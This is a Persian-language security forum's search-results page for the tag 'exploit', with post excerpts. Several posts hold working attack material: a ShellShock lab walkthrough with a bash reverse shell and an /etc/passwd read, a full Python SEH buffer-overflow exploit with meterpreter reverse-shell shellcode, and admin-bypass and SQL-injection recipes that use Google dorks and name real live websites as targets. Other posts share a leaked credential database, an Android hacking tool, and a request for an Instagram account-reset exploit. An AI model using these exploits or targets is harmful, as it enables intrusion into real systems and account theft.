رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'exploit'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • تالار اصلی سایت
    • قوانین سایت
    • آسیب پذیری های کشف و گزارش شده
    • رقابت های فتح پرچم ( CTF )
    • بخش سوال و جواب های عمومی
  • بخش تست نفوذ پذیری
    • اخبار دنیای امنیت
    • باگ بانتی (Bug Bounty)
    • ابزارهای امنیتی و آنالیز سیستم ها
    • ویدیو های آموزشی آزمایشگاه امنیت
    • تحلیل و بررسی آسیب پذیری های سایت و سرورها
    • امنیت سیستم های شخصی
    • امنیت شبکه های وایرلس
    • ابزار و اسکریپت های امنیتی
    • Vulnerability Laboratory
  • بخش مدیریت شبکه
    • امنیت شبکه و سرور (Network Security)
    • آموزش های سرورهای ویندوز (Windows Server)
    • مدیریت شبکه
    • مجازی سازی
    • کشف جرائم رایانه ای (Forensics)
    • Library
  • بخش برنامه نویسی و کامپیوتر
    • کامپیوتر
    • برنامه نویسی تحت وب
    • برنامه نویسی تحت دسکتاپ
    • سیستم عامل
  • بخش کرک (Crack)

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me


Name


Telegram


Instagram


Main os


Twitter


Skype

15 نتیجه پیدا شد

  1. blackops

    مجموعه Windows Exploit Development

    با سلام. یکی از مباحثی که تو حوزه اکسپلویتینگ مطرح هستش رو بستر ویندوز هستش. از یکی از سایتها یک مجموعه pdf از دوره اکسپلویت 2021 گیر اوردم و براتون آپلود کردم که شامل موارد زیر هستش: Unicode Buffer Overflows Windows Egghunting Exploits Study Guide Windows Return Oriented Programing Windows SEH-based Overflows Windows Shellcoding Windows Stack Overflow لینک دانلود: موفق باشید🌹
  2. Stubborn

    هک اندروید

    با سلام در حال جستجو در سطح نت بودم که به یه بحث رسید که جالب بود و خوشحال میشم با شما اشتراک بزارمش بحث ما هک اندروید توسط پایتون است . میشه گفت از کاتولاین برگرفته است PhoneSploit نصب git clone #File cd PhoneSploit pip install colorama python2 main_linux.py دانلود : PhoneSploit-master.zip منبع github حسبی الله
  3. ooresiropo

    اکسپلویت روز صفر یا 0day Exploit

    سلام و درود بر دوستان عزیز میخواستم بپرسم از شما دوستان کسی میدونه چطور میشه exploit های سایت 0day.today رو از جایی رایگان به دست بیارم؟ اکسپلوست ریست کردن اکانت اینستا رو میخوام پیدا کنم. بگید ممنون میشم.❤❤❤
  4. با سلام امروزه آسیب پذیری های گوناگونی منتشر میشوند و روز به روز شرکت های بزرگ به چالش کشیده میشوند New Remote Code Execution (RCE) Vulnerability in Apache Struts 2 اما در این پست میخواهیم در مورد آسیب پذیری apache struts صحبت کنیم که خالی از لطف نیست در اینجا کد اثبات این آسیب پذیری هست که میتوانید جزییات آن را مشاهده کنید (CVE-2018-11776), طبق گفته معمار ارشد امنیت Recorded Future کد اثبات این آسیب پذیری در GitHub منتشر شد همراه با یک اسکریپت git link script python به زبان پایتون هست که در بالا مشاهده میکنید اشکالی که Apache Struts 2.3 تا 2.3.34 و 2.5 تا 2.5.16 را تحت تأثیر قرار می دهد به دلیل اعتبار نامناسب داده های ورودی هست توصیه میشود کاربران struts2.3 به نسخه 2.3.35 و کاربران struts 2.5 به 2.5.17 ارتقا دهند اما چگونگی بهره برداری از این نوع آسیب پذیری : در واقع هکر با استفاده از Content-Type مخرب در header http میاد کد خودش رو تزریق میکنه و به راحتی میتونه از راه دور کد دلخواه خود رو اجرا کند اما اسکن از این نوع آسیب پذیری که ایا تارگت مورد نظر آسیب پذیر هست یا خیر که میتونید با دستور زیر اینکارو انجام دهید nmap -p <port> --script http-vuln-cve2017-5638 --script-args path=<application path> <target IP Address> نگاهی کوچیک به حملات اخیر : این حملات از 1323 آدرس آی پی در 40 کشور مختلف هست درقمست دوم پست با ساختار نحوه نفوذ و نوع حمله آشنا میشیم در قسمت سوم این پست با نحوه چگونگی ساخت اسکریپت آشنا میشیم
  5. blackops

    Search Engine Exploit

    با سلام. سایتی پیدا کردم در زمینه پیدا کردن اکسپلویت در همه cms ها و وب سرور ها و ...... خیلی جالب و title بندی هستش و اگر اون اکسپلویت به ابزار خاصی هم نیاز داشته باشه بهتون میگه. https://sploitus.com خودتون ببینید بهتر متوجه میشید. موفق باشید.53.gif53.gif
  6. این آموزش یک آزمایشگاه تست نفوذ برای تولید و نشان دادن نحوه بهره برداری از آسیب پذیری ShellShock می باشد دانلود آسیب پذیر : https://www.pentesterlab.com/exercises/cve-2014-6271 اندازه: 19 مگابایت نوع سیستم عامل: لینوکس یک نقص در سمت Bash مورد ارزیابی برخی از متغیرهای محیطی خاص قرار گرفته است . یک مهاجم می تواند از این نقص برای رفع محدودیت های محیطی یا رفع محدودیت ها برای اجرای دستورات Shell استفاده کند که ما قبلا shellshock را با چارچوب Metasploit مورد سوء استفاده قرار دادیم. Shellshock به نام Bashdoor نیز شناخته می شود ، یک باگ امنیتی امنیتی در Unix Bash shell است که اولین مورد آن در 24 سپتامبر 2014 منتشر شد. بسیاری از سرویس های اینترنتی مانند بعضی از سرویس دهندگان وب، از Bash برای پردازش استفاده می کنند این درخواست، به مهاجم این اجازه را می دهد برای اجرای دستورات دلخواه به ایجاد نسخه های آسیب پذیر از Bash اقدام کند و مهاجم بتواند دسترسی غیرمجاز به سیستم کامپیوتری را به دست آورد . مرحله 1 – فایل ISO فوق را دانلود کنید و در Vmware Workstation نصب کنید در اینجا ما از کالی لینوکس (192.168.169.137) به عنوان یک مهاجم (همیشه) استفاده میکنیم و سعی میکنیم از طریق مرورگر (192.168.169.139) به IP Pentesterlab دسترسی پیدا کنیم که به صورت زیر است: درخواست را با استفاده از Intercept متوقف کنید و آن را به تب Spider بفرستید Burp Spider یک ابزار خودکار خزیدن (crawling) برای برنامه های کاربردی وب است در حالی که معمولا فرایند های دستی زمان زیادی را از شما می گیرد می توانید از Burp Spider به طور خودکار برای برنامه های بسیار بزرگ و با زمان کمتری از این این فرایند استفاده کنید. Burp Spider از تکنیک های مختلف برای خزیدن در محتوای برنامه استفاده می کند و به طور پیش فرض تمام پیوندها در دامنه را دنبال می کند ، فرم ها را با داده های ساختگی ارسال می کند و درخواست های بیشتری را (برای robots.txt، ریشه های دایرکتوری و ...) می سازد . در برخی موارد، اجرای خودکار Spider می تواند پیامدهای ناخواسته ای مانند ثبت نام حساب کاربری جدید ، تولید ایمیل های بازخورد یا تغییر حالت دیگر برنامه داشته باشد . برای بهره برداری از "Shellshock"، باید راهی برای گفتگو با Bash پیدا کنیم . به این معنی که CGI که از Bash استفاده می کند را پیدا خواهد کرد . CGI ها معمولا از پایتون یا پرل استفاده می کنند ، اما غیر معمول نیست (در سرورهای قدیمی)، CGI در Shell یا حتی C نوشته شده است. بنابراین ما یک اسکریپت به نام وضعیت “status” در زیر پوشه cgi-bin داریمMIME که از نوع JSON است. اگر از کد منبع صفحه اصلی نگاه کنید، یک لینک اسکریپت cgi وجود دارد که دستورات سیستم را اجرا می کند و آنها را در یک صفحه وب نمایش می دهد. پس از پیدا کردن صفحه CGI، میتوانید از «wget» برای آزمایش اینکه آیا آسیب پذیری ShellShock در این صفحه CGI وجود دارد یا خیر، استفاده کنید. Command: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; /bin/bash -c ‘echo vulnerable'” http://192.168.169.139/cgi-bin/status همانطور که در بالا می بینیم ، دستور “echo vulnerable” توسط سرور اجرا شده است، بنابراین به ShellShock آسیب پذیر است. در ابتدا یک ترمینال را به عنوان یک شنونده در پورت 5555 با استفاده از ابزار netcat تنظیم کنید. Command: nc -nlvp 5555 در ترمینال دیگری فرمان زیر که به اتصال بالا در پورت مشخص شده اتصال می دهد. Command: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; /bin/bash -i >& /dev/tcp/192.168.169.137/5555 0>&1″ http://192.168.169.139/cgi-bin/status اگر شروع اتصال در حالت hanging باشد ، نشانه واقعا خوبی است ، CGI در انتظار شما برای اتصال است. با رفتن به Netcat می توانیم دستورات (whoami, id, uname -a ) را به صورت محلی تایپ کنیم و آنها را در سیستم آسیب دیده به اجرا در آوریم که در زیر نشان داده شده است: همانطور که دستگاه Pentesterlab متعلق به گروه sudoers است بنابراین با تایپ دستور "sudo / bin / bash" به راحتی می توانید ROOT را دریافت کنید. علاوه بر این، شما می توانید با BurpSuite هم اکسپلویت کنید. با استفاده از BurpSuite به جای Wget، هدر User-Agent را تغییر دهید و می توانید از Burp repeater استفاده کنید درخواست را متوقف کنید و به تب Repeater ارسال کنید: توجه داشته باشید : اطمینان حاصل کنید که در پایان درخواست خام خود را در Burp ، تعداد 2 خط خالی وجود دارد در غیر این صورت درخواست کار نخواهد کرد! بخش درخواست را با کد زیر تغییر دهید تا تست کنید آیا هدف آسیب پذیر است یا خیر. GET /cgi-bin/status HTTP/1.0 user-agent: () { :; }; /bin/bash -c ‘echo Vulnerable!’ همانگونه که قبلا دیده ایم ، اگر خطای سرور داخلی عدد 500 یا عدیدی که با 5 شروع شده باشد را نشان دهد، به این معنی است که هدف به ShellShock آسیب پذیر است. در گام بعد ، سعی کنید محتویات فایل /etc / passwd با همان کد را بردارید. GET /cgi-bin/status HTTP/1.0 user-agent: () { :; }; /bin/bash -c ‘cat /etc/passwd’ اما هیچ خروجی نمایش داده نشد. در گام بعدی سعی کنید دستگاه کالی لینوکس خود را با هدرهای کامل باز کنید . GET /cgi-bin/status HTTP/1.1 Host: 192.168.169.139 User-Agent: () { :; }; /bin/bash -c ‘ping -c 3 192.168.169.137’ Accept: text/html, application/xhtml-xml, application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 اکنون مشاهده می کنید عدد 200 را به عنوان پاسخ دریافت کردیم و خروجی روی صفحه نمایش داده می شود که شما با استفاده از ابزار TCPDUMP برای درخواست ICMP می توانید آن را تایید کنید. Command: tcpdump -i eth0 -n icmp ادامه دارد ... ( کپی فقط با ذکر منبع )
  7. |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: cmnice solutions admin bypass with noredirect |[+] |[+] Exploit Author: Iran Cyber Security Group |[+] Vendor Homepage: https://cmnicesolutions.com |[+] Tested on : Windows |[+] Google Dork: intext:"by cmnice solutions" |[+] Home: iran-cyber.org |[+] Discovered By: r4j4z |--------------------------------------------------------------| |[+] poc |[+] Use Addons Noredirect |[+] ^http://www.site.com/admin/login.php |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://fahtara.com/admin/login.php |[+] read this doc (http://fahtara.com/admin/manual.pdf) |[+] http://deeprelaxspa.com/admin/login.php |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| https://cxsecurity.com/issue/WLB-2018040222
  8. rajaz

    2x Ajans Sql Injection

    |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: 2X Ajans SQL injection |[+] |[+] Exploit Author: Iran Cyber Security Group |[+] Discovered By: r4j4z |[+] Vendor Homepage: http://www.2xajans.com |[+] Tested on : Windows |[+] Google Dork: intext:Design by 2X Ajans inurl:id= |[+] Home: iran-cyber.org |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://ustungucaktarma.com/urunler.php?id=9%27 |[+] |[+] http://www.gazibant.com/urunler.php?id=6%27 |[+] |[+] http://usgmadencilik.com/urun-detay.php?id=2%27 |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| https://cxsecurity.com/issue/WLB-2018040110
  9. rajaz

    Bihar Web Solutions Admin Bypass

    https://cxsecurity.com/issue/WLB-2018020219 ########################## # Exploit Title: Bihar Web Solutions Admin Login Bypass # Google Dork : intext:Site Designed By : "Bihar Web Solutions Pvt. Ltd." # Date: 2018-02-18 # Exploit Author: Iran Cyber Security Group # Discovered By: r4j4z # Tested on : Windows ########################## Search dork and select Target. Put [/panel] After url such as : # http://site.com/panel # Now enter fill username and Password like the information below : # Username : '=' 'or' # Password : '=' 'or' ############################ # Demo : http://www.Target.com/panel http://lpsedu.co.in/panel ############################
  10. Mkali07

    Peneladigital Sql Injection

    با سلام # Exploit Title: PenelaDigital sql injection # Google Dork: intext:"Powered by PenelaDigital " inurl:".php?id=" # Date: 2017-12-24 # Vendor Homepage: http://www.peneladigital.pt/ # Tested on: Linux # Exploit Author: Mkali07 #My Team:https://iran-cyber.net/ # POC : # SQL Injection : *Open browser and search dork in google *Selected in target *Attack site http://site.com/[path].php?id=[sql] #Demo: http://pecipenela.pt/caract-carro.php?id=9%27 # Contact Wth Me : [email protected] Good luck لینک اکسپلویت : https://cxsecurity.com/issue/WLB-2017120188 موفق باشید
  11. AmirCreeD

    !!! Exploit.in Database

    http://uploadboy.me/8ner4o50uoy4/exploit.in.zip.html Password: iran-cyber.net
  12. سلام خدمت تمامی دوستان با یکی دیگه از آموزش های بررسی مختصر و مفید آسیب پذیری های تحت وب در خدمت شما هستیم ../ خب توی این تاپیک قصد داریم Code Injection رو توضیح بدیم ../ توی یک جمله مختصر و مفید میشه معرفیش کرد : آسیب پذیری که توسز اون میتونید Code های خودتون رو اجرا کنید ( اینجا منظور کد PHP ) ../ خب برای درک بهتر نمونه کدی ببینیم : $variable_id = "varid"; $x = $_GET['id']; eval("\$varid = \$x;"); خب اینجا کسی اگه یکم دقت کنه میتونه ببینه که از eval استفاده شده و راحت میشه کد PHP دلخواه رو اجرا کرد ../ خب مثال میزنیم ... اگه پارامتر ورودی id رو قرار بدیم : file.php?id=1; phpinfo() راحت میشه phpinfo رو دید و به راحتی میشه Code Injection رو انجام داد ../ امیدوارم مورد قبول واقع شده باشه، موفق باشید
  13. سلام دوستان امروز میخوایم آسیب پذیری Log Injection رو به شما معرفی میکنیم ../ این آسیب پذیری به شما کمک میکنه که بتونید لاگی که خودتون دوست دارید رو توی لاگ بریزید ../ نمونه ای از این آسیب پذیری رو ببینید : String val = request.getParameter("val"); try { int value = Integer.parseInt(val); } catch (NumberFormatException) { log.info("Failed to parse val = " + val); } خب میبینید که اینجا صفحه پارامتد ورودی val رو میگیره و اگه عددی بود اون رو توی value میریزه و اگه نبود توی فایل لاگ متنی به این صورت قرار میده : INFO: Failed to parse val = (MATN) خب حالا شما به راحتی میتونید val رو هر چیزی بخواید بزارید و در لاگ قرار بدید ../ برای نمونه اگه پارامتر ورودی val رو با مقدار test%0a%0aINFO:+User+logged+out%3dc10n3r ارسال کنید اون موقع توی لاگ این قطعه قرار داده میشه : INFO: Failed to parse val=test INFO: User logged out=c10n3r موفق باشید
  14. اسیب پذیری بافر اورفلو در برنامه Easy File Sharing Web Server 7.2 https://packetstormsecurity.com/files/138589/Easy-File-Sharing-Web-Server-7.2-SEH-Buffer-Overflow.html https://cxsecurity.com/issue/WLB-2016090019 #!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter) # Date: 2016/8/31 # Exploit Author: Iran Cyber Security Group # Vendor Homepage: http://www.sharing-file.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 7.2 [LATEST] # Tested on: Microsoft Windows 7 Professional x86 [should Work On The Other Operating Systems] # CVE : N/A # Usage : python exploit.py [iP or Domain] # Discovered By Arash Khazaei (AKA XoDiAK) # Greetz To Iran Cyber Members & My Friends import sys,socket from struct import pack HOST = sys.argv[1] PORT = 80 # msfvenom -p windows/meterpreter/reverse_tcp -b '\x2f\x5c' -i 2 -f c 335 Byte # Replace It With Your Own Shellcode ! shellcode = ("w00tw00t" + "\xd9\xc9\xbf\x35\xfe\x35\x6e\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" "\x4e\x31\x7e\x17\x83\xc6\x04\x03\x4b\xed\xd7\x9b\x6a\xff\xc1" "\x10\xa8\xf4\xa8\xf1\x79\x4b\x8d\xf4\xcf\x36\xbf\xbe\x1e\x4d" "\xd8\x43\x1a\xa9\x5b\x81\x1f\xdd\x18\x78\xb2\x84\x32\xfb\x61" "\x03\x6f\x9e\xe5\x0f\x3d\x70\x9b\xbb\xd1\x2e\x81\x1c\xa6\x79" "\x74\x27\x17\xde\x04\x4b\x10\x89\x6b\xd3\xe4\xc0\x6c\x47\x32" "\xf4\x44\xeb\x7e\x1e\xd7\x62\x4c\x56\x0f\x58\x2e\x1a\x12\xc9" "\x0e\x12\x81\x30\xc9\x30\x3c\x76\xc0\x7a\xc0\xe0\x3b\xba\x6f" "\xfc\x5b\xe3\x3f\x1c\xa6\x37\x3d\xf5\x6b\xf3\x1a\xe0\x82\x85" "\xc8\xee\xce\xc8\xa2\xf9\x0e\x84\xe3\xac\x36\xe6\x3b\xc0\xe7" "\x61\xc1\xd3\xef\xf1\x4e\xc3\xde\xfd\xc7\x77\x5b\x51\xbc\xab" "\x2d\xb9\x65\x03\xc1\x01\x47\xbe\x50\xe2\xfc\x96\x96\xab\xd3" "\xf8\x53\x15\x69\xc6\xcd\x34\xdb\xd3\xcd\xcc\xdd\x02\x24\x31" "\x9f\xc0\xce\x41\x53\xf0\xe0\xb1\xd7\x96\xfc\x16\xe4\x10\xba" "\xd0\xd0\x10\x02\x40\xdc\x33\x9d\xb5\x35\xbb\x3f\x4f\x93\x11" "\x9a\x16\x63\x1b\x60\xa1\xab\x5e\x05\xf2\x7c\x02\x57\x99\x90" "\x88\x4d\xcf\x60\x3a\x9f\x77\x8a\x9e\xff\x1c\x91\x61\xec\x5e" "\xd4\x08\x54\x76\xfb\xdb\x45\xda\x8f\x01\xba\xed\x01\xef\x09" "\xc1\x5d\x8f\x2b\x24\x69\xc0\xbf\x44\x03\x6e\x62\x7c\x39\x6a" "\xab\x18\x70\xe5\xff\xe6\x33\x3b\x2b\x37\xf1\xb3\x92\xd6\x59" "\xcc\xc8\xca\x8d\x9d\x34\xf9\x89\xf7\x26\xbc\x60\xa1\xdf\xcb" "\xa8\x9d\xd2\x9f\x33\x5a\x48\xb2\x8d\xc5\xaa\x9f\x3c\x37\x0b" "\x98\x35\x70\x3b\xe0") # Padding ! junk = "A" * 4061 # Next SEH nseh = "\xeb\x06\x90\x90" # 0x1000108b [imageLoader.dll] POP POP RET seh = pack('<L', 0x10018848) # Egg Hunter 32 Byte Tag = w00tw00t egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") exploit = junk + nseh + seh + egghunter + shellcode + "\x90"*(len(junk)-4-4-32-8-335-5000) try: s = socket.socket() s.connect((HOST, PORT)) s.send("GET " + exploit + " HTTP/1.0\r\n\r\n") s.close() except: print "Can't Connect To Web Server ! Is it up ?" print "Evil Buffer Sended Successfully!" EFS Web Server 7.2. SEH Overflow (EggHunter).zip
  15. XoDiAK

    Offensive Security Cracking The Perimeter Ebook

    دانلود کتاب Offensive Security Cracking the Perimeter پسورد : iran-cyber.net Offensive.Security.BackTrack.to.the.Max.Cracking.the.Perimeter.v1.0[iran-cyber.net].rar

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...